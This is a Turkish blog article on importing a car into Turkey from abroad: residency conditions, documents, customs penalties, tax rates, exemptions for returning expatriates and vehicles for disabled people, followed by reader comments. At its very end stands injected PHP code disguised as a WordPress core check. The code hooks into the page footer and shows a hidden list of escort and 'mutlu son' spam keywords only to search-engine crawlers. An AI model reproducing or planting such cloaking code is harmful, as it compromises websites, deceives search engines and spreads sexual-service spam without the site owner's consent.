Yurt Dışından Araba Getirmek 2021 Hesaplaması

Yurt Dışından Araba Getirmek 2021 Hesaplaması

Yurt dışına çıktınız, araba aldınız ve aracınızı Türkiye’ ye getirmek istiyorsunuz fakat nasıl getireceğinizi bilmiyorsunuz. Bizde bu yazımızda yurt dışından araba getirmek 2021, şartları, gerekli belgeleri, getirme vergisi hesaplaması, emekli ve çalışan farkı, kesin geri dönüş yapanların araç getirme hakları, yurt dışından vergisiz ve engelli aracı getirme konularını sizler için araştırdık.

Yurt Dışından Araba Getirmek 2021

Bir araba beğendiniz ama Türkiye’ de satışı yok ve yurt dışından almak ve getirmek durumundasınız. Fakat ülkemize yurt dışından araç getirmek için bazı şartlar bulunuyor, bu şartları sağlamadığınız sürece aracınızı getiremezsiniz. Peki bu Şartlar nelerdir?

 • Bu şartlardan en bilinmesi gereken ve önemli kural olan şart, Yurt dışında yani ikamet ettiğiniz ülkede 185 gün bulunma şartı. Bunun için ikamet belgenizin yanında olması gerekmektedir. Ayrıca kullandığınız aracın yaşadığınız ülkede ikamet edilen yere kayıtlı olması gerekmektedir.
 • Aracıyla Türkiye’ye giriş yapacak kişinin 180 günden fazla ülke dışında bulunmuş olması gerekmektedir.
 • Ayrıca aracın ülkemize girişi sırasında; yurt dışı mülkiyet belgesi ve yurt içinde geçerli sayılacak sigorta poliçesi gereklidir.
 • Yurt dışından getirilen araçların en fazla 730 gün seyahat etme özgürlüğü vardır.
 • Yurt dışından vekalet ile araba getirebilirsiniz. Fakat vekaleti olan kişininde 185 gün boyuncu ikamet adresine kayıtlı ülkede bulunmuş olması gerekmektedir.

Türkiye’ye Giriş Yapılacak Araç İçin Gerekli Evraklar

 • Aracın ikamet edilen ülkede kayıtlı olduğunu gösteren mülkiyet belgesi, ruhsat
 • Taşıtı getiren kişinin ehliyeti
 • Yurt dışı ikameti gösteren belgeler, pasaport, oturum izni ve kimlik.
 • Türkiye’ de geçerli olması gereken trafik sigorta poliçesi
 • Duruma göre vekaletname ve kira sözleşmesi
 • Yurt dışından emekliler için elçilik veya konsolosluk onaylı türkçe tercümeli emeklilik belgesi
 • Tüzel kişilikler için taşıtları getiren kişilerin çalışan ya da şirket ortağı olduğunu gösteren Noter ya da konsolosluk onaylı türkçe tercümeli belge

Yabancı plakalı kara taşıtları için yolcu rehberi‘ ni buradan inceleyebilirsiniz.

Yurt Dışından Getirilen Araç Süresini Aşma Cezası Nedir ?

Yurt Dışından Getirilen Araç Süresini Aşma Cezası Nedir ?

Gümrük Kanunu 238. Maddesine göre;

241 inci maddenin üçüncü fıkrasının (h), (l) ve

(m) bentleri, dördüncü fıkrasının (g) ve (h) bentleri ile beşinci fıkrasının (b) bendinde belirtilen durumlar hariç, dâhilde işleme rejimi, gümrük kontrolü altında işleme rejimi ile geçici ithalat rejimine ilişkin hükümlerin ihlali halinde eşyanın gümrüklenmiş değerinin iki katı, tam muafiyet suretiyle geçici olarak ithal edilen özel kullanıma mahsus taşıtlar için gümrük vergileri tutarının dörtte biri oranında para cezası verilir. Ancak, dâhilde işleme rejimi kapsamı ithal eşyasının, işleme faaliyetindeki hali veya işlem görmüş ürün hali de dahil olmak üzere rejim çerçevesinde izin verilen yerlerde tespiti halinde, ithal eşyasının gümrük vergileri tutarının iki katı oranında para cezası verilir. Bu cezanın ödeme süresi içinde eşyanın gümrükçe onaylanmış başka bir işlem veya kullanıma tabi tutulmaması halinde eşyanın gümrük vergileri tutarında para cezası tahsil edilir.

Yurt Dışından Araç Getirmede Emekli Ve Çalışan Farkı Var Mıdır?

Yurt dışından araba getirmek isteyenlerin diğer bir merak ettiği konuda çalışan ve emeklilik durumuna göre bir fark var mıdır sorusu. Araç getirmek için çalışan veya emeklilik durumu pek fark etmiyor. Yurt dışından emekli olan ve ilk kez araç getiren kişilerin daha öncesinde 185 gün kuralına bakılmaz. Ancak hem emekli hem de çalışanlar için kalma süresi 730 gündür ve değişmez.

Yurt Dışından Araba Getirme Vergi Hesaplaması 2021

Yurt dışından araç getirildiğinde yasal olarak vergi ödenmesi gerekir. Bu vergiler bazı hesaplamalar üzerinden alınır.

 • KDV hesaplaması
 • ÖTV üzerinden KDV hesaplaması
 • Aracın silindir hacmi ve
 • ÖTV’ li satış fiyatı

Belirlenmiş oranlar doğrultusunda güncel fiyatlar üzerinden bu maddeler ele alınarak hesaplamalar yapılır. %50 ÖTV bedeli ile hesaplamalar yapılır ve Türkiye’ye araç getirme işlemi tamamlanmış olur. Ötv silindir hacmi ve fiyata bağlı olarak değişiklik gösterir. Katma değer vergisi ise Vergisiz satış tutarı ve ÖTV üzerinden hesaplanır. KDV, %18′ lik orana sahiptir.

Aracın Motor Hacmi ÖTV ORANI (%)
1600 cc’yi geçmeyen %45
1600 cc’ yi geçen 2000 cc’ yi geçmeyen %90
2000 cc’ yi geçenler %145

Yurt Dışından Kesin Dönüş Yapanların Araç Getirme Hakkı

Resmi Gazete’ de yayımlanan Gümrük ve Ticaret Bakanlığının ” Gümrük Muafiyeti Tebliği” ne göre, gurbetçi vatandaşlarımızın kesin olarak ülkeye dönmesi, yurt dışındaki görevleri biten ve geri dönen kamu görevlileri ve Türk vatandaşlığına geçenlerin kesin olarak Türkiye’ ye yerleşmesiyle birlikte özel vasıtaları, eşyaları vergilerden muaf olabilecek. Burada dikkat edilmesi gereken bir nokta var. Yurt dışında en az 24 ay ikamet ettikten sonra kesin kararla dönenler bu muafiyetten yararlanabilecektir. Özel aracı olan kişilerin muafiyetten yararlanabilmeleri için; aracın kişin üstüne yapıldığı yıl ile birlikte aracın model yılının üç yıldan düşük olmaması gerekiyor. Tebliğde belirtilen bu kişilerin geri tarihlere bakıldığında Türkiye’ de 6 aydan fazla kalmamış olmamaları gerekiyor. Yurt içinde bir yılda 45 gün kalmış olanların bu gün sayıları ise ülke ki ikamet süresine ek olarak sayılacak, 5 yıl yurt dışında ikamet edenlerde ise bu süre aranmayacak.

Bir de bu muafiyetten yararlanamayacak olanları da ele alırsak;

 • 24 ayı aşmayan sürelerle yurt dışında görevlendirilen kamu personeli,
 • Evlilik nedeniyle Türk vatandaşlığına geçenler,
 • Motorlu ticari ve diğer ticari araçlar,
 • İkametini Türkiye’ ye taşıyan ve Türk vatandaşlığına geçen çifte vatandaşlar,
 • Muaf olan kişilerin serbest dolaşıma girmelerinin üzerinden 5 yıl geçmedikçe diğer araçlarına ilişkin talepleri kabul edilmeyecektir.
 • Sürekli olarak yurt dışında göreve atanan kamu görevlileri, yine başka bir ülkeye atanma nedeninden dolayı kesin olarak Türkiye’ ye dönemeyecekleri için bu muafiyetten yararlanamayacaklardır.
Yurt Dışından Araç Getirmede Emekli Ve Çalışan Farkı Var Mı?

Yurt Dışından Vergisiz Araç Nasıl Getirilir?

Yurt dışından vergisiz araç getirmek için yukarıda saydığımız özellikleri taşıyanlar vergiden muaf olurlar. Bu kişilerin getirdiği araçlardan gümrük vergi alınmasa da ÖTV ve KDV bedelleri alınmaktadır. O zaman bir de bu şartları sağlayan kişilerin hangi araçları getirebileceklerini inceleyelim.

Muaf Olan Kişilerin Getirebileceği Araçlar

 • Motorlu özel araçlar. Otomobile ek olarak karavanlar ve römorklar, motosiklet, özel uçak, her türlü eğlence ve spor amaçlı araçlar.
 • Motorsuz araçlar. Her türlü bisiklet, kano ve kürekli kayıklar getirilebilmektedir.
 • T.C Ticaret Bakanlığı Gümrük Rehberini buradan inceleyebilirsiniz.

Yurt Dışından Araba Satın Almak 2021

Beğendiğiniz bir aracı almak istediğinizde ülke içinde daha aracın satışı başlamamış olabiliyor ya da araç daha uygun fiyatlı olabiliyor. Bu nedenleri daha çok açabiliriz fakat saydığımız bu iki neden yurt dışından araba almak için öne çıkanlardan ikisidir. Yurt dışından istediğiniz arabayı uygun fiyatta almak isterken, Türkiye’ ye arabayı getirmek için belli başlı kuralların hatta yasaların olduğunu unutmayın. Yurt dışından araba aldığınızda yurt dışı ikametiniz olması gerekiyor. İkametiniz varsa arabanız sadece 730 gün izinli sayılıyor. Fakat yurt dışından araba aldıktan sonra belli başlı şartları yerine getirdikten sonra Türkiye’ ye kesin olarak geri döndüğünüzde vergilerden de muaf olabiliyorsunuz. Yine de bu kadar zahmete katlanmamak için arabanın Türkiye’ de satışını bekleyebilirsiniz.

Yurt Dışından Engelli Aracı Nasıl Getirilir?

Yurt Dışından Engelli Aracı Nasıl Getirilir?

Yurt dışından engelli aracı getirmek için kişinin engel durumuna göre iki çeşit araç getirilmektedir.

 • Bizzat engelli kişi için tarafınan kullanılan araçlar
 • El ve ayak fonksiyonlarını tamamen yitirmiş olmaları nedeniyle bizzat engelli kişi tarafından kullanılmayan, araca binip inmesiyle taşınmasını kolaylaştırıcı düzeni bulunan araçlar.

Özel düzenekli araçlar için araç ülkemize gelmeden önce engellin kendisi veya vasisinin,

 • Ankara Gar Gümrük Müdürlüğü
 • Yeşilköy Gümrük Müdürlüğü
 • İzmir Yolcu Salonu Gümrük Müdürlüğü
 • Malatya Gümrük Müdürlü
 • Gebze Gümrük Müdürlüğü
 • Mersin Gümrük Müdürlüğü
 • Rize Gümrük Müdürlüğüne idarelerinden birine başvurması gerekmektedir.

Müracaat için gerekli belgeleri de;

Engelli kişi tarafından kullanılamayacak araçlar içinse

 • Sağlık Bakanlığından alınmış kişinin el ve ayak fonksiyonlarının tamamını yitirmiş olduğunu ve bir düzenek ile taşınabileceğini gösteren sağlık kurumu raporu ya da noterden alınmış örnek belge
 • Yurt dışında ise, ikamet nakil belgesi ve mülkiyet belgesi
 • Aracın düzeneği ile ilgili fatura
 • Nüfus cüzdanı örneği
 • İkamet eğer Türkiye’ deyse vukuatlı nüfus kayıt örneği olarak belirtilmiştir.

Yurt dışından araba aldınız fakat Türkiye’ ye getirmek için gerekli kuralları bilmiyorsanız. Bu yazımızda merak edilen soruları cevapladık.

YORUMLAR

 1. Çetin dedi ki:

  biz turkiyede yasayan turk gurbetciler icin bir turlu araba getirmek icin zahmetsiz ve masrafsiz bir formul hic bir donemde bulmak istenmedi. Ama biz gurbetciler her yil dunyanin parasini turkiye ye getirip ve turk ekonomisine birakiyoruz. Ayrica Turkiyemizi gurbette savunup , kotu soz soyletmiyoruz. Allah askina Bu araba getirme konusunda biraz insaf yaaa…. Ben 35 yil hollanda da yasadim, so iki yildir turkiyeye geri donus yaptim malesef bir araba getiremedim. En son arabam 5 yasinda oldugu ve cifte vatandas oldugum icin arabami turkiye getiremedim, Turkiyede de araba almak artik bir hayal oldu. Biz gurbetcileri zengin saniyorlar ama oyle degil. Yani bir geri donus yapan bir gurbetci olrak magdur oldum. Ulkemi seven ve vatan hasreti icinde yillarca ozlem icinde olan bir gurbetci olarak bazen geri donus yaptigima pisman olmadim diyemiyorum. Dilerim bunu yetkililer okurlar ve benim gibi binlerce geri donus yapmis kisilerin bu araba magduriyeti giderilir … Saygilar

  1. Ferdi dedi ki:

   Aynen öyle kardesim.. Çifte vatandassan aracini TR’ye getirip TR plakasi alamiyorsun. Askerlik parani tikir tikir ödemissin, para için TR vatandasligini satmamissin ve mükafatina bir bak hele! Sade TR vatandasi isen ancak o halde aracini getirip ÖTV ve KDV’sini ödedikten sonra aracina TR plakasi alabiliyorsun. Ayrica, isin en garip ve adaletsiz tarafi da, birçok vatandaslar askerlik parasini ödememek için vatandasliktan çikanlar (mavi kartlilar) ve ayni zamanda ecnebiler/yabancilar, TR’den misafir plakasi olarak (sanirim 2 yilligina) TR plakasi alabiliyorlar! Bu tabloya bir bakarmisin?! Kimlere kolaylik, kimlere zorluk?

  2. Ferdi dedi ki:

   Çetin bey, dün yaziniza bir gurbetçi vatandas olarak yanit vermistim, yazim onaylama asamasinda henüz. Dünkü yazima ilave etmek istedigim ve açiklik getirmek istedigim birkaç husus var, gerçek manada objektif olmamiz gerekirse eger..
   Olaya sirf biz gurbetçiler açisindan baktigimiz takdirde, ilk etapta bazi durumlar zorumuza gidiyor olabilir çünkü, sizinde beyan etmis oldugunuz gibi, yillardir hep vatanimizin yaninda yer aldik, Türkiyenin karni agrisa, bizim basimiz agrir, Türkiye darda olsa aklimiz her an orada olur. Her yil tatilimizi ve paramizi vatanimizda harcadik, vatandasliktan çikmayarak askerlik paramizi tikir tikir yatirdik, ekonomik açidan birçok katkilarimiz olmasina ragmen bir arabamizi dahi getiremiyoruz gibi dert yaniyoruz, evet.. Lakin, bir de olayin diger bir yüzü var ve onu devlet açisindan hiç hesaplamadik isin gerçegi, ben de dahil.

   Dün aksam tesadüf üzeri konsoloslukta görevli olan çok samimi arakadasimizla bulusmamiz oldu ve bu konu üzerinde de sohbetimiz geçti. O da aynen söyle bir beyanda bulundu, evet sirf bu açidan bakarsak olaya biraz üzücü bir durum lakin, bir de devletin tarafindan bakarsak olaya devletimizin neden böyle yaptigini ve yapma zorunda kaldigini daha iyi anlariz, dedi.
   Sözlerine söyle devam etti, bir gurbetçi vatandasimiz yillardir gurbette yasadiktan sonra kesin dönüs yaptigi takdirde, (yerlesik vatandas statüsüne geçmekte) içeride dogma büyüme yerlesik bir vatandastan ayri bir muameleye tabii tutulamaz, kanunen. Mesela, kesin dönüs yapip, yurtdisindan çok daha makul bir fiyata almis oldugu arbasini (vergisiz) ithal etmis olsa, dogma büyüme yerlesik vatandasina da ayni imkani tanimasi gerekecek, kanunen. Ve onlarda böyle yapmis olsa, devletin kasasina büyük ölçüde zarar olur. O milyarlarca yükü kaldiramaz duruma gelir. Birine ayri muamele, digerine ayri muamele devlet yapamaz.
   Ha, kesin dönüs yapmazsan, gurbetçi olarak 2 yil aracini kullanabiliyorsun zaten, bu da ayri bir kolaylik olarak sunuldu zaten.
   Ayrica, devletin motorlu tasitlara ÖTV zammi yapmasinin bir diger nedeni de, akaryakitta ki ÖTV’yi neredeyse sifirladigindan kaynaklaniyormus.

   Olayin birde bu tarafini ögrendikten sonra, devletimizin bazi kararlari zorunlu olarak almasi gerektigini ve de bir duyarli vatandas olarakta bu bilgileri paylasma zorunlulugunu hissettim kendimde ayni zamanda.. Çünkü birçok gurbetçi vatandaslarimiz bu konudan sikayetçi, düne kadar ben de dahilinde..

   Yani Çetin bey kardesim, uzun lafin kisasi, madalyanin iki tarafi oldugunu zaman zaman unuttugumuz oluyor. Bir devlet, 85 milyonu barindiriyorsa, 85 milyon türlü türlü dertleri vardir demektir.
   Allah bu zor günlerde hepimize saglik ve afiyet versin, devletimize ve milletimize de zeval vermesin. Saygilar

 2. OZCAN ADIGUZEL dedi ki:

  meraba bunu 2 kezde yasmis olabilirim cunku oburunun gidip gitmediginden emin degilim SAYIN YETKILILER BEN OZCAN ADIGUZEL 30 YILDIR HOLLANDA BELCKADA IKAMETGAG ETMEKDEYIM BURALAR NASILDIYE SORARSANIZ CEVABI KOLAY BULBULU ALTIN KAFESE KOYMUSLAR GINEDE VATANIM DEMIS MALESEF BEN VE BENIM GIBI BINLERCE INSAN BIZE UYGULANAN KANUNDAN MENMUN DEGILIS NEYMIS EURO GETIR YER AL SAT YATIRIMYAP BASIMIZIN USDUNDE YERINIZ VAR AMA ARACINI GETIR AMA SADE 2 SENE KALABILIN HADI TELEFONUNUNDA GETIR AMA 3 AY ICINDE KESERIZ CUNKU SENI YANI BIZI TAM SOYMA KANUNU ARKADAS 1000 VERMIS BIR TELEFON ALIYON TURKIYEYE VARIYON 3 AYICINDE KESIYORLAR ACDIRMAK ICN 2 MILYARDA ORAYA VER EEEE TELEFONLAR 3 SENE ICINDE GUNCELLENE GUNCELENE BIDAHA GUNCELLENMIYOR VE OLUYOR YAZIK BIZLERE BASDADA DEDIGIM GIBI BEN BIR TURK VATANDASIYIM YAZDIKLARIMDAN DOLAYIDA BELKI TURKIYEYE VARDIGIMDA ICERI ATABILIRSINIZ CUNKU TV GORUYORUZ ADAMKAR NELER YAPIYOR DENETIMLI SERBEST KALIYOR TV BAKIYORIZ YAZIK KADININ AGZINI BURNUNU KIRAN ADAMA ENGELOLUNUYOR MAPIS YATIYOR NEYSE BEN BASIMDA BIR OLAYDAN BAHSEDEYIM BEN KALP VE SEKER DAHA BAZI RAHATSIZLIKLARI ILAN BIR VATABDASIYIM CANIM BIRTARAFA TURKIYEM BIRTARAFA [ AMA SU BIZI SOYUCU KANUNLARA DUR DIYIN LUTVEN NE ALSAK HAAAA BU ALMANCI VUR NEYSE 04.07.2019 TARIHINDE 2 SENE KALA BILIRDIYE KANUN VAR ARACIMI TURKIYEME BIRAKDIM IZINIMI YAPDIM HAVALANINDAN IZMIRDEN CIKARKEN 18 AY GUN VERDI MEMURA BU NE DEDIM NORMALDE 04,07,2021 DE TAM 24 AY OLUYOR ARABANIN GUNU AMA BENIM 6 AYIMA KESDI NICINDEDIM BANA MEMUR DEDI SEN 3 AY BIR KALMISIN BIR BUCUK AY KALMISIN BIRBUCUK AYDA BIRDAHA KALMISIN DEDI VE 6 AYIMI AZLTI SU AN BENIM BUAY YANI 23,02,2021 DE ARABAM CIKMASI LAZIMMIS YADA ALTINDAN CIKAMAYACAGIM SONUCLARLA KARSILASIRMISIM KUSADASINDAKI MEMUR BANA OYLE DEDI 1 SIMDI KORANA 2 ORTALIK KAR KIS 3 DEDIGIM GIBI KENDIM KALP HASTASIYIM DAHADA VAR RAHATSIZLIGIM YANI BU KORANADA KARKISDA USTELIK BU KORANADA DIGER ULKELERDE ARACIMI NASIL SUREREK GETIRE BILIRIM YAZIN KALABALIKDA ADAMLARIN ULKELERINDEN CANIMIZI KALABALIK OLDUGUMUZ HALDE ZOR KURTARIP GELIYORUZKI BEN KISIN NAPAYIM SIZ YETKILLILERDEN RICAM BIR COZUM NORMAKDE BENIM ARACIM 04,07,2021 E KADAR OLMALI AMA ANLAMADIM BANA 23/02.2021 CIKMAM ISDENILIYOR ARACIM 1.SYF.926 PILAKA BELCIKA VITO EN AZINDAN YAZ SONRASI CIKARABILIRIM IZIN DONUSU BUNU YAZDIM BIR UMUT BILIYORUM TURKIYEDE BUNU KAYLEYE ALINCAGINI TAHMIN ETMEK COK ZOR AMA BELKI BIRILERI BIR EL UZATIR KULAK VERIR SAYGILARIMLA

 3. Ramazan dedi ki:

  Eğer hala Türkiye de iseniz aracı bir yabancı uyruklu birine satıp kurtulabilirsiniz bence en mantıklı olan bu yöntem…

 4. Vedat dedi ki:

  Yurt disinda yasiyorum suan 2.el araba götürme imkanim varmi türkiyeye ?

 5. Agamurat dedi ki:

  Selamünaleyküm ban Turkiyede 1 senedir oturyorum.
  Kandim Türkmenistanliyim Turkiyeye kandi aracimi getirmek istiyorum memleketimden
  Auidi 2019 seneli arabam var, ve onu Türk plakasını yaptırmak isterim vergisi ne kadar olacak acaba yardımcım olurmusiniz
  Teşekkürler

function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = '
Süleymanpaşa escort Yenice escort Susurluk escort Yomra escort Yunusemre escort Yatağan escort Viranşehir escort Türkoğlu escort Uzunköprü escort Harran escort Sandıklı escort Dulkadiroğlu escort Söke escort Görele escort Reşadiye escort Şarkışla escort Sorgun escort Kestel escort Bilecik mutlu son Beylikdüzü mutlu son Burhaniye mutlu son Bulancak mutlu son Bozüyük mutlu son Bingöl mutlu son Beyoğlu mutlu son Canik mutlu son Çan mutlu son Bucak mutlu son Mamak mutlu son Çerkezköy mutlu son Bartın mutlu son Çorlu mutlu son Maraş mutlu son Denizli mutlu son
'; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');